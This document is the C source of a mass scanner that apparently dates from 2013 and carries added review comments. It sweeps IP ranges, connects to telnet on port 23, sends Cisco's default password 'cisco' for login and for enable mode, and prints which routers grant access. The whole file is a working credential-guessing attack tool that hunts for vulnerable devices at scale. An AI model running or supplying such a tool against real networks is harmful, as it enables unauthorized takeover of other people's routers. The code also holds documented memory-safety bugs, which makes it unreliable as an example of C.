Compact mass scanner for Cisco routers with default telnet/enable passwords.
867a0b5fd20fabea27f9b864ebcfd8aa4198e3378d494f86556283265b4301b0
/*
Author: OverIP
Andrea Piscopiello
overip at gmail.com
Source: OCS v 0.2
License: GPL
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
Email: Write me for any problem or suggestion at: overip at gmail.com
Date: 01/10/13
Read me: Just compile it with:
gcc ocs.c -o ocs -lpthread
Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
xxx.xxx.xxx.xxx=range start IP
yyy.yyy.yyy.yyy=range end IP
PAY ATTENTION: This source is coded only for personal use on
your own Cisco router. Don't hack around.
Special thanks to:
Khlero with your patience this code is out there :*
Shen139, without you I can't live :D
people that helped betatesting this code :)
Alex Kah and his Cisco Router :)
I love U all :*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
/* Shared scanner state. Everything below is a plain file-scope global that is
   written by the main thread and read by the scan thread; the only thing that
   keeps the accesses from overlapping is that function1() joins each scan
   thread before it touches these again. */
int i=0; // first octet of the address currently being scanned (maintained by function1)
int j=0; // second octet
int k=0; // third octet
int l=0; // fourth octet
char buffer_a[700]; // reply read by scanna() after the first string is sent
char buffer_b[700]; // reply read by scanna() after the "enable" exchange
char buffer_c[700]; // banner read by scanna() right after connect()
char tmpIP[16]; // dotted quad handed to the scan thread; "255.255.255.255" plus NUL fills it exactly
pthread_t threadname; // handle of the single scan thread; note <pthread.h> is not in the include list above
/* Thread entry point for one scan. Reads the address from the global tmpIP
   (filled by function1() just before pthread_create) and never returns
   normally: scanna() ends the thread with pthread_exit(), and so does the
   fallback call below. Declared as a void function with no parameters but
   passed to pthread_create(), which expects void *(*)(void *); the mismatch
   is undefined behavior even where it happens to work. No prototype for
   scanna() is visible above this line, so the call relies on an implicit
   declaration. */
void callScan() // thread body: scan the address held in tmpIP
{
scanna(tmpIP);
pthread_exit(0);
}
/* SIGALRM handler installed by scanna() before connect(). It terminates the
   calling thread, apparently to abandon a scan that has not finished within
   the alarm(7) window. pthread_exit() is not async-signal-safe, so calling it
   from a signal handler is undefined behavior. */
static void funcAlarm() // alarm: give up on the current scan thread
{
pthread_exit(0);
}
/*
 * Despite its name this does not switch the socket to O_NONBLOCK: it installs
 * a 10-second receive timeout (SO_RCVTIMEO) so that recv() on `sock` returns
 * instead of blocking forever. Returns 1 when setsockopt() succeeds and 0 when
 * it fails (e.g. for an invalid descriptor). Not called anywhere in this file;
 * the one call site in scanna() is commented out.
 */
int setnonblock(int sock) // install a 10 s receive timeout on the socket
{
struct timeval recv_timeout = { 10, 0 };
int rc = setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &recv_timeout, sizeof recv_timeout);
return rc == 0 ? 1 : 0;
}
/*
 * Fills `address` with an IPv4 endpoint: family AF_INET, `port` converted to
 * network byte order, and `IP` stored into s_addr without any byte swapping
 * (so a caller must pass it already in network order). Fields other than
 * sin_family, sin_port and sin_addr are left untouched. Not referenced
 * anywhere else in this file.
 */
void init(struct sockaddr_in *address,int port,int IP)
{
unsigned short port_net = htons((unsigned short)port);
address->sin_addr.s_addr = IP;
address->sin_port = port_net;
address->sin_family = AF_INET;
}
/*
 * Scans one address: connects to TCP port 23 of rangeIP, reads the banner,
 * sends the hard-coded strings below and classifies the reply by the prompt
 * character ('>' or '#') it contains, printing a verdict to stdout. Never
 * returns: every path ends in pthread_exit(0), so the int return type is
 * never honored and the only output is what is printed.
 *
 * Defects visible in this body (left as-is, documented for review):
 *  - close(sd) runs before sd is assigned: it reads an uninitialized int,
 *    which is undefined behavior, and may close an unrelated descriptor.
 *  - inet_addr() has no visible prototype (<arpa/inet.h> is not included)
 *    and its INADDR_NONE failure value is never checked.
 *  - recv() and send() results are ignored; a recv() that fills all 700
 *    bytes leaves no terminating NUL, so the strstr() calls can read past
 *    the buffer.
 *  - alarm(7) is cancelled only at the very end, so SIGALRM bounds the whole
 *    exchange (including the sleep() calls), not just connect(), and the
 *    handler funcAlarm() calls the non-async-signal-safe pthread_exit().
 *  - signal(SIGALRM,NULL): NULL happens to equal SIG_DFL on common
 *    platforms, but SIG_DFL is the portable spelling.
 *  - When buffer_a already matched '#', the buffer_b test below still runs
 *    and prints "Router not vulnerable." for the same host.
 *  - buffer_a/b/c are file-scope globals shared by every scan thread.
 */
int scanna(char*rangeIP) //scan a single address
{
int error;
int sd;
struct sockaddr_in server;
close(sd); /* BUG: sd is uninitialized at this point */
server.sin_family=AF_INET;
server.sin_port=htons(23); /* telnet */
server.sin_addr.s_addr=inet_addr(rangeIP); /* no prototype visible; failure (INADDR_NONE) not checked */
sd=socket(AF_INET,SOCK_STREAM,0);
if(sd==-1)
{
printf("Socket Error(%s)\n",rangeIP);
close(sd); /* close(-1): fails with EBADF, otherwise a no-op */
pthread_exit(0);
}
// setnonblock(sd); /* receive timeout disabled; only the alarm below bounds this scan */
signal(SIGALRM,funcAlarm);
alarm(7); /* SIGALRM fires 7 s from here unless alarm(0) below runs first */
fflush(stdout);
error=connect(sd,(struct sockaddr*)&server,sizeof(server));
if(error==0)
{
printf("\n\n-%s\n",rangeIP);
fflush(stdout);
memset(buffer_c, '\0',700);
recv(sd,buffer_c,700,0); /* banner; neither the length nor the content is used */
printf(" |Logging... %s\n",rangeIP);
fflush(stdout);
memset(buffer_a, '\0',700);
memset(buffer_b, '\0',700);
send(sd,"cisco\r",6,0);
sleep(1);
recv(sd,buffer_a,700,0); /* unchecked length; a full read leaves no NUL for strstr() */
if(strstr(buffer_a,"#"))
printf(" |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
else
if(strstr(buffer_a,">"))
{
printf(" |Default Telnet password found. %s\n",rangeIP);
fflush(stdout);
send(sd,"enable\r",7,0);
sleep(1);
send(sd,"cisco\r",6,0);
sleep(1);
recv(sd,buffer_b,700,0); /* unchecked, same NUL caveat as buffer_a */
//printf(" Trying to log in to enable mode\n");
//fflush(stdout);
}
/* Runs regardless of which branch above was taken: after a '#' match on
   buffer_a, buffer_b is still all zeros and this prints "not vulnerable". */
if(strstr(buffer_b,"#"))
printf(" |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
else
printf(" |Router not vulnerable. \n");
fflush(stdout);
}
else
{
printf("\n\n(%s) Filtered Ports\n",rangeIP); /* every connect() failure is reported as filtered */
close(sd);
alarm(0);
signal(SIGALRM,NULL);
pthread_exit(0);
}
close(sd);
fflush(stdout);
alarm(0); /* cancel the pending SIGALRM before the thread exits */
signal(SIGALRM,NULL);
pthread_exit(0);
}
char *getByte(char *IP,int index);
/*
 * Walks every dotted-quad address from IP up to and including IP2, handing
 * each one to a fresh scan thread through the global tmpIP and waiting for it
 * with pthread_join() before moving on, so scans run one at a time. The four
 * octets live in the globals i, j, k, l and carry into the next octet at 256.
 * The exit test compares against IP2 only after an increment, so the last
 * address is scanned once more after the loop. Precondition (enforced by
 * main()): IP sorts before IP2 at the first differing octet; otherwise the
 * exit test is never satisfied and the counters grow without bound, which
 * would eventually overflow rangeIP. Declared int but never returns a value;
 * main() ignores the result. IP2 is re-parsed four times per iteration.
 */
int function1(char* IP, char* IP2)
{
char rangeIP[16]; /* "%d.%d.%d.%d" of octets <= 255 fits with the NUL */
pid_t pid; /* unused */
i=atoi(getByte(IP,1));
j=atoi(getByte(IP,2));
k=atoi(getByte(IP,3));
l=atoi(getByte(IP,4));
while(1)
{
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
strcpy(tmpIP,rangeIP); /* publish the address to the scan thread via the global */
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
{
printf("+ Thread error:\n");
perror(" - pthread_create() ");
exit(0); /* exit status 0 despite the failure */
}
fflush(stdout);
pthread_join(threadname, NULL); /* serializes the scans and the tmpIP writes */
fflush(stdout);
l++;
if (l==256)
{
l=0;
k++;
if (k==256)
{
k=0;
j++;
if (j==256)
{
j=0;
i++;
}
}
}
/* Stop once the incremented address equals the end of the range. */
if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
{
break;
}
}
/* The end address itself was not scanned inside the loop; do it here. */
sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
strcpy(tmpIP,rangeIP);
fflush(stdout);
if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
{
printf("+ Thread error:\n");
perror(" - pthread_create() ");
exit(0);
}
pthread_join(threadname, NULL);
fflush(stdout);
}
/*
 * Entry point. Prints the banner, requires exactly two dotted-quad arguments,
 * rejects any octet above 255 (but not negative or non-numeric input, since
 * atoi() silently yields 0 for garbage), then compares the two addresses
 * octet by octet: start < end at the first differing octet runs function1();
 * start > end prints usage; all octets equal scans the single address in this
 * thread. w runs to 5, one past the last octet: getByte() returns "" for a
 * fifth field, so that iteration compares 0 with 0 and is harmless.
 * exit(-1) yields exit status 255 on POSIX systems.
 */
int main(int argc,char *argv[])
{
int w;
printf("********************************* OCS v 0.2 **********************************\n");
printf("**** ****\n");
printf("**** coded by OverIP ****\n");
printf("**** overip at gmail.com ****\n");
printf("**** under GPL License ****\n");
printf("**** ****\n");
printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n");
printf("**** ****\n");
printf("**** xxx.xxx.xxx.xxx = range start IP ****\n");
printf("**** yyy.yyy.yyy.yyy = range end IP ****\n");
printf("**** ****\n");
printf("******************************************************************************\n");
if(argc!=3)
{
printf("use: %s IP IP\n",argv[0]);
exit(-1);
}
/* Range check only; atoi() accepts non-numeric and negative fields. */
for(w=1;w<=5;w++)
if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
{
printf("use: ./OCS IP IP\n");
exit (-1);
}
/* Lexicographic compare of the octets decides range scan vs. usage error. */
for(w=1;w<=5;w++)
if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w)))
{
function1(argv[1],argv[2]);
return 0;
}
else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
{
printf("use: %s IP IP\n",argv[0]);
return 0;
}
/* Identical addresses: no thread, scanna() ends the process via pthread_exit(). */
printf("Same IPs \n");
fflush(stdout);
scanna(argv[1]);
return 0;
}
/*
 * Returns the `index`-th (1-based) dot-separated field of IP as a string in a
 * static buffer. The buffer is overwritten by the next call, so the result
 * must be consumed (e.g. by atoi()) before getByte() is called again; an
 * index with no matching field yields "".
 *
 * Defects visible here:
 *  - byte[] has 3 elements, but the zeroing loop writes byte[0..3] and a
 *    three-digit field needs 4 bytes including the terminator: both write
 *    one byte past the array (undefined behavior).
 *  - Characters are appended one at a time with strncat(), which rescans the
 *    buffer on every call, and no field length limit is enforced.
 *  - The local i shadows the global i; i<strlen(IP) compares int with size_t.
 *  - The memset() repeats the zeroing loop just above it.
 */
char *getByte(char *IP,int index)
{
int i=0; /* shadows the global i */
int separator=0; /* number of '.' seen so far */
static char byte[3]; /* too small: see header comment */
for(i=0;i<4;i++)
byte[i]='\0'; /* BUG: byte[3] is out of bounds */
memset(byte,0,sizeof(byte));
for(i=0;i<strlen(IP);i++)
{
if((IP[i]=='.') && (separator==index-1))
{
return byte; /* end of the requested field */
}
else
if(IP[i]=='.')
{
separator++;
}
else
if (separator==index-1)
{
strncat(byte,&IP[i],1); /* BUG: a third digit plus NUL overflows byte[] */
}
}
return byte;
}